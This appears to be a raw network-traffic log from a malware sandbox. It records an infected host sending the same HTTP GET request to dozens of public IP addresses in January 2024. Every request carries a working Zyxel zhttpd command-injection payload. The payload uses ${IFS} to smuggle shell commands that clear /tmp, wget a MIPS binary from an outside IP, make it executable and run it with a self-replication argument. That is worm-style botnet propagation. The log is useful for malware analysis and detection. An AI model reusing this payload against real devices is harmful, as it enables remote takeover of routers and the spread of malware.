                                          Jan 14, 2024 15:46:29.294799089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7620192.168.2.2343936135.202.226.225443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.294838905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7621192.168.2.234789874.3.157.192443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.294857025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7622192.168.2.23592162.183.90.89443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.294882059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7623192.168.2.2333430190.82.181.50443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.294905901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7624192.168.2.235481652.47.210.100443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.294929981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7625192.168.2.2343722185.150.45.58443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.294960976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7626192.168.2.235389213.142.184.50443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.294979095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7627192.168.2.233714469.234.51.211443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.295027018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7628192.168.2.2333606187.92.176.67443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.295041084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7629192.168.2.233698863.116.132.231443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.295063972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7630192.168.2.235373287.111.62.133443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.295109034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7631192.168.2.235480858.119.83.132443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.295136929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7632192.168.2.235630031.14.136.166443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.295166969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7633192.168.2.2347072176.103.53.106443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.295190096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7634192.168.2.2349962151.160.54.68443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.295243025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7635192.168.2.2346444102.57.202.14443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.295270920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7636192.168.2.233692477.194.214.42443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.295298100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7637192.168.2.234615836.29.97.53443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.295329094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7638192.168.2.2333224202.154.131.10443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.297553062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7639192.168.2.2347864219.161.62.189443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.297574997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7640192.168.2.2347260221.250.116.186443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.297595978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7641192.168.2.233566257.43.166.4443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.297651052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7642192.168.2.235920670.151.189.180443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.297656059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7643192.168.2.2334678206.189.174.144443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.297710896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7644192.168.2.2334390112.245.172.117443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.297727108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7645192.168.2.2337190129.4.55.207443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.298120975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7646192.168.2.2344516143.169.155.225443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.298131943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7647192.168.2.2348416220.145.253.89443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.298157930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7648192.168.2.235956248.187.157.28443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.298245907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7649192.168.2.2358744162.229.163.184443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.298249960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7650192.168.2.2348632208.179.234.141443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.298281908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7651192.168.2.2338190217.222.136.191443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.298329115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7652192.168.2.2358820154.187.109.192443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.298329115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7653192.168.2.235704057.242.157.119443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.298386097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7654192.168.2.236016817.224.128.176443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.298438072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7655192.168.2.2354942142.190.95.215443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.308619022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7656192.168.2.233286275.193.86.26443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.308643103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7657192.168.2.2343680159.124.5.156443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.308662891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7658192.168.2.2356506177.131.196.32443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.308686018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7659192.168.2.234416290.82.211.231443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.308733940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7660192.168.2.2333538174.113.171.205443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.308757067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7661192.168.2.2360526157.77.171.158443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.308799982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7662192.168.2.2355858124.138.153.43443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.308819056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7663192.168.2.2356448143.75.20.137443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.308861017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7664192.168.2.233876462.2.207.31443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.308902025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7665192.168.2.234229292.207.129.225443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.308932066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7666192.168.2.234963877.89.3.132443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.308949947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7667192.168.2.2355648133.59.133.89443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.308974981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7668192.168.2.2354890150.241.86.134443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.309000015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7669192.168.2.2343280209.61.30.207443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.309022903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7670192.168.2.2336306149.183.75.212443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.309056997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7671192.168.2.2338192190.168.179.238443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.309087038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7672192.168.2.23498929.62.204.185443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.309108019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7673192.168.2.236082698.209.143.245443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.309130907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7674192.168.2.2334754210.54.233.171443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.309160948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7675192.168.2.234726048.36.34.134443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.309190035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7676192.168.2.234633483.186.82.205443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.309221029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7677192.168.2.2342594121.253.72.221443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.309245110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7678192.168.2.2352852135.157.80.215443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.309283018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7679192.168.2.2352086176.202.217.88443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.309298992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7680192.168.2.233920438.120.9.115443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.309322119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7681192.168.2.2355534171.247.254.36443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.309360981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7682192.168.2.235801494.95.145.220443
                                          TimestampBytes transferredDirectionData
